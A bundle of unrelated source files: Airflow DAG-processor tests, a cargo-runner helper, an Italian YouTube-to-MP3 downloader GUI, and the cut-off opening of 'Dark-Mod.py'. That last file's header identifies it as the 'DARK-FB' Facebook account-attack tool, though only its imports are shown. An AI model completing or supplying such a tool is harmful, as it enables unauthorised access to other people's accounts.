clear_db_serialized_dags()
clear_db_dags()
def teardown_class(self):
clear_db_runs()
clear_db_serialized_dags()
clear_db_dags()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_remove_file_clears_import_error(self, tmpdir):
filename_to_parse = tmpdir / 'temp_dag.py'
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines('an invalid airflow DAG')
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=tmpdir,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
with create_session() as session:
self.run_processor_manager_one_loop(manager, parent_pipe)
import_errors = session.query(errors.ImportError).all()
assert len(import_errors) == 1
filename_to_parse.remove()
# Rerun the scheduler once the dag file has been removed
self.run_processor_manager_one_loop(manager, parent_pipe)
import_errors = session.query(errors.ImportError).all()
assert len(import_errors) == 0
session.rollback()
child_pipe.close()
parent_pipe.close()
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
Test that when a processor already exist with a filepath, a new processor won't be created
with that filepath. The filepath will just be removed from the list.
"""
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
# Because of the config: '[scheduler] parsing_processes = 2'
# verify that only one extra process is created
# and since a processor with 'file_1' already exists,
# even though it is first in '_file_path_queue'
# a new processor is created with 'file_2' and not 'file_1'.
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
expected_order = dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_recently_modified_file_is_parsed_with_mtime_mode(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""
Test recently updated files are processed even if min_file_process_interval is not reached
"""
freezed_base_time = timezone.datetime(2020, 1, 5, 0, 0, 0)
initial_file_1_mtime = (freezed_base_time - timedelta(minutes=5)).timestamp()
dag_files = ["file_1.py"]
mock_getmtime.side_effect = [initial_file_1_mtime]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=3,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
# let's say the DAG was just parsed 2 seconds before the Freezed time
last_finish_time = freezed_base_time - timedelta(seconds=10)
manager._file_stats = {
"file_1.py": DagFileStat(1, 0, last_finish_time, 1.0, 1),
}
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
manager.prepare_file_path_queue()
assert manager._file_path_queue == []
# Simulate the DAG modification by using modified_time which is greater
# than the last_parse_time but still less than now - min_file_process_interval
file_1_new_mtime = freezed_base_time - timedelta(seconds=5)
file_1_new_mtime_ts = file_1_new_mtime.timestamp()
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
mock_getmtime.side_effect = [file_1_new_mtime_ts]
manager.prepare_file_path_queue()
# Check that file is added to the queue even though file was just recently passed
assert manager._file_path_queue == ["file_1.py"]
assert last_finish_time < file_1_new_mtime
assert (
manager._file_process_interval
> (freezed_base_time - manager.get_last_finish_time("file_1.py")).total_seconds()
)
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
dag_run = dag.create_dagrun(
state=DagRunState.RUNNING,
execution_date=DEFAULT_DATE,
run_type=DagRunType.SCHEDULED,
session=session,
)
ti = TI(task, run_id=dag_run.run_id, state=State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.flush()
ti.job_id = local_job.id
session.add(ti)
session.flush()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies()
requests = manager._callback_to_execute[dag.fileloc]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.fileloc
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.run_id == requests[0].simple_task_instance.run_id
session.query(TI).delete()
session.query(LJ).delete()
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(
self, mock_processor
):
"""
Check that the same set of failure callback with zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
dag_run = dag.create_dagrun(
state=DagRunState.RUNNING,
execution_date=DEFAULT_DATE,
run_type=DagRunType.SCHEDULED,
session=session,
)
task = dag.get_task(task_id='run_this_last')
ti = TI(task, run_id=dag_run.run_id, state=State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.flush()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.flush()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_pipe_full_deadlock(self, mock_processor):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
# A reasonable large number to ensure that we trigger the deadlock
max_runs=100,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
@conf_vars({('core', 'load_examples'): 'False'})
@mock.patch('airflow.dag_processing.manager.Stats.timing')
def test_send_file_processing_statsd_timing(self, statsd_timing_mock, tmpdir):
filename_to_parse = tmpdir / 'temp_dag.py'
dag_code = dedent(
"""
from airflow import DAG
dag = DAG(dag_id='temp_dag', schedule_interval='0 0 * * *')
"""
)
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(dag_code)
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=tmpdir,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
last_runtime = manager.get_last_runtime(manager.file_paths[0])
child_pipe.close()
parent_pipe.close()
statsd_timing_mock.assert_called_with('dag_processing.last_duration.temp_dag', last_runtime)
def test_refresh_dags_dir_doesnt_delete_zipped_dags(self, tmpdir):
"""Test DagFileProcessorManager._refresh_dag_dir method"""
manager = DagFileProcessorManager(
dag_directory=TEST_DAG_FOLDER,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(dag_folder=tmpdir, include_examples=False)
zipped_dag_path = os.path.join(TEST_DAGS_FOLDER, "test_zip.zip")
dagbag.process_file(zipped_dag_path)
dag = dagbag.get_dag("test_zip_dag")
dag.sync_to_db()
SerializedDagModel.write_dag(dag)
manager.last_dag_dir_refresh_time = timezone.utcnow() - timedelta(minutes=10)
manager._refresh_dag_dir()
# Assert dag not deleted in SDM
assert SerializedDagModel.has_dag('test_zip_dag')
# assert code not delted
assert DagCode.has_dag(dag.fileloc)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
# Since we are reloading logging config not creating this file,
# we should expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path, 1, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
utilbuild.py
|
def output_reader(pipe, queue):
try:
with pipe:
for l in iter(pipe.readline, b''):
queue.put(l)
finally:
queue.put(None)
def cargo_run(args, logging, cwd = None, faketime = None):
import subprocess
import shutil
from threading import Thread
from queue import Queue
if faketime is None:
faketime = []
else:
faketime_bin = shutil.which("faketime")
if faketime_bin is None:
logging.error("Please install faketime")
raise Exception("faketime not found")
faketime = [faketime_bin, "-m", faketime]
cargo = shutil.which("cargo")
args = faketime + [cargo] + args
logging.info("Running %s", " ".join(args))
assert cargo is not None
p = subprocess.Popen(args,
stdout = subprocess.PIPE, stderr = subprocess.PIPE, cwd = cwd)
q = Queue()
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.debug(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
raise Exception("cargo failed with return code %s" % rc)
|
yt_downloader_with_GUI_new.py
|
import glob
import os
import re
import sys
import urllib
from tkinter import (BOTH, CENTER, RIGHT, YES, HORIZONTAL, Button, Entry, Label, Listbox, Menu,
Scrollbar, StringVar, Tk, Toplevel, Y, font)
from tkinter import messagebox as m_box
from tkinter.ttk import Progressbar
from numpy import insert
import validators
from moviepy.editor import AudioFileClip
from pytube import YouTube, exceptions, request
import subprocess
from threading import Thread
request.default_range_size = 2097152 # about 2MB chunk size
ws = Tk()
ws.title('YT Downloader - Scarica le tue canzoni')
ws.geometry('1000x600')
ws.eval('tk::PlaceWindow . center')
if getattr(sys, 'frozen', False):
dirname = os.path.dirname(sys.executable)
elif __file__:
dirname = os.path.dirname(__file__)
# ws.iconbitmap(os.path.join(dirname, "icon", "icon.ico"))
### Center the window ###
#Same size will be defined in variable for center screen in Tk_Width and Tk_height
Tk_Width = 1000
Tk_Height = 600
#calculate coordination of screen and window form
x_Left = int(ws.winfo_screenwidth()/2 - Tk_Width/2)
y_Top = int(ws.winfo_screenheight()/2 - Tk_Height/2)
# Write following format for center screen
ws.geometry("+{}+{}".format(x_Left, y_Top))
###
def make_menu(w):
global the_menu
the_menu = Menu(w, tearoff=0)
the_menu.add_command(label="Taglia")
the_menu.add_command(label="Copia")
the_menu.add_command(label="Incolla")
def show_menu(e):
w = e.widget
the_menu.entryconfigure("Taglia",
command=lambda: w.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copia",
command=lambda: w.event_generate("<<Copy>>"))
the_menu.entryconfigure("Incolla",
command=lambda: w.event_generate("<<Paste>>"))
the_menu.tk.call("tk_popup", the_menu, e.x_root, e.y_root)
def delSelected():
link_selected = lb.curselection()
if len(link_selected) == 0:
m_box.showerror("Error", "Nessun link selezionato")
for i in link_selected:
lb.delete(i)
def insert_link():
inserted_link = link.get()
inserted_link.replace(" ", "")
# check if inserted string is a valid url
if validators.url(inserted_link):
#check if the link is a YouTube link
try:
YouTube(inserted_link).check_availability()
list_of_urls = lb.get(0, 'end')
# check if the link was already inserted
if inserted_link not in list_of_urls:
lb.insert('end',inserted_link)
yt_link.delete(0,'end')
else:
yt_link.delete(0,'end')
m_box.showerror("Error", "Link YouTube già inserito!")
except exceptions.VideoUnavailable:
yt_link.delete(0,'end')
m_box.showerror("Error", "Link video YouTube non disponibile!\nInserisci un link di un video YouTube!")
except urllib.error.URLError:
yt_link.delete(0,'end')
m_box.showerror("Error", "Internet non disponibile")
else:
yt_link.delete(0,'end')
m_box.showerror("Error", "Inserisci un link valido!")
def NewWindow():
# Toplevel object which will
# be treated as a new window
global newWindow, lab, lab1, pb1, label2
newWindow = Toplevel(ws)
# sets the title of the
# Toplevel widget
newWindow.title("Download")
# sets the geometry of toplevel
newWindow.geometry("600x100+400+200")
# A Label widget to show in toplevel
lab = Label(newWindow, text ="", font=("Times", 14),justify=CENTER)
# lab.place(relx=0.5, rely=0.5, anchor="center")
# lab.grid(row=0,column=2)
lab.pack(side="top")
lab1 = Label(newWindow, text = "", font=("Arial Italic",11),justify=CENTER)
lab1.pack(side="top")
pb1 = Progressbar(newWindow, orient=HORIZONTAL, length=300, mode='indeterminate')
pb1.pack(expand=True,side="left")
# pb1.grid(row=3,column=2)
pb1.start()
#percentage label
label2=Label(newWindow,text="0%",font=("Arial Bold",15))
label2.pack(expand=True,fill=BOTH,side="left" )
# label2.grid(row=3,column=3)
def check():
list_of_urls = lb.get(0, 'end')
if len(list_of_urls) == 0:
m_box.showerror("Error", "Nessun link inserito")
else:
answer=m_box.askyesnocancel("Richiesta", "Vuoi davvero scaricare tutte le canzoni?")
if answer:
if os.path.isdir(dirname+"/Canzoni_mp4"): #if Canzoni_mp4 esiste allora chiedi se vuole cancellare
answer=m_box.askyesnocancel("Richiesta", "Vuoi cancellare tutte le canzoni che ci sono nella cartella 'Canzoni_mp4'?")
if answer:
files = glob.glob('./Canzoni_mp4/*')
for f in files:
os.remove(f)
download()
else:
pass
def threading():
# Call check function
t1=Thread(target=check)
t1.start()
def threading1():
# Call check function
t1=Thread(target=insert_link)
t1.start()
def changeText(txt,title):
lab.configure(text=txt)
lab1.configure(text=title)
def on_progress(stream, chunk, bytes_remaining):
global inc
total_size = stream.filesize
bytes_downloaded = total_size - bytes_remaining
percentage_of_completion = bytes_downloaded / total_size * 100
inc=int(percentage_of_completion)
pb1["value"]+=inc-pb1["value"]
label2.config(text=f"{inc}%")
if pb1["value"]==100:
pb1.grid_forget()
label2.grid_forget()
label2["text"]="0%"
pb1["value"]=0
def download():
flag = False #flag per vedere se il download è andato a buon fine
NewWindow()
list_of_urls = lb.get(0, 'end')
try:
for i in list_of_urls:
if flag:
label2.pack()
pb1.config(mode="determinate")
pb1.stop()
yt = YouTube(i)
title = yt.title
title = re.sub(r'[\\/*?:"<>|]',"-",title)
changeText("Sto SCARICANDO: \n",title)
default_filename = title + ".mp4"
new_filename = title+'.mp3'
parent_dir = os.path.join(dirname, "Canzoni_mp4")
str = yt.streams.get_audio_only()
yt.register_on_progress_callback(on_progress)
str.download(output_path=parent_dir,filename=default_filename,max_retries=10)
try:
changeText("Sto CONVERTENDO da MP4 a MP3:\n",title)
pb1.config(mode="indeterminate")
pb1.start()
label2.pack_forget()
subprocess.run([
'ffmpeg', '-y',
'-i', os.path.join(parent_dir, default_filename),
os.path.join(parent_dir, new_filename)
],shell=True)
# audioclip = AudioFileClip(os.path.join(parent_dir, default_filename))
# audioclip.write_audiofile(os.path.join(parent_dir, new_filename))
# audioclip.close()
files = glob.glob(parent_dir+'/*.mp4')
for f in files:
os.remove(f)
flag = True
except:
flag=False
files = glob.glob(parent_dir+'/*.mp4')
for f in files:
os.remove(f)
newWindow.destroy()
m_box.showerror("Error", "Errore di conversione da MP4 a MP3")
except:
flag=False
newWindow.destroy()
m_box.showerror("Error", "Errore di download")
newWindow.destroy()
if flag: m_box.showinfo("Scaricato", "Ho scaricato tutto")
make_menu(ws)
show = Label(ws, anchor="w",fg ="#f5453c", text = 'Bentornato su "YT Downloader - Scarica le tue canzoni"', font = ("Serif", 14), padx = 0, pady = 10)
show.pack()
show = Label(ws, text = "Lista dei link delle canzoni che vuoi scaricare: ",
font = ("Times", 14), padx = 10, pady = 5)
show.pack()
lb = Listbox(ws, selectmode = "multiple")
scroll_one=Scrollbar(ws,command=lb.yview)
lb.configure(yscrollcommand=scroll_one.set)
lb.pack(padx = 20, pady = 0, expand = YES, fill = BOTH)
scroll_one.pack(side=RIGHT,fill=Y)
get_info = Label(ws, text="Inserisci il link della canzone che vuoi scaricare: ",
font = ("Times", 14), padx = 10, pady = 10)
get_info.pack()
link = StringVar()
yt_link = Entry(ws, width=60, textvariable=link)
yt_link.pack()
yt_link.bind_class("Entry", "<Button-3><ButtonRelease-3>", show_menu)
yt_link.focus()
Button(ws, text="Inserisci link", command=threading1).pack()
ws.bind('<Return>',lambda event:threading1())
Button(ws, text="Cancella link", command=delSelected).pack()
ws.bind('<Delete>',lambda event:delSelected())
Button(ws, text="Scarica le canzoni", command=threading, activeforeground ="#f5453c").pack()
ws.mainloop()
|
Dark-Mod.py
|
#!/usr/bin/python
# coding=utf-8
# (BHV) RedDemons
# Source : Python2 Gerak"
# DARK-FB version1.7
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
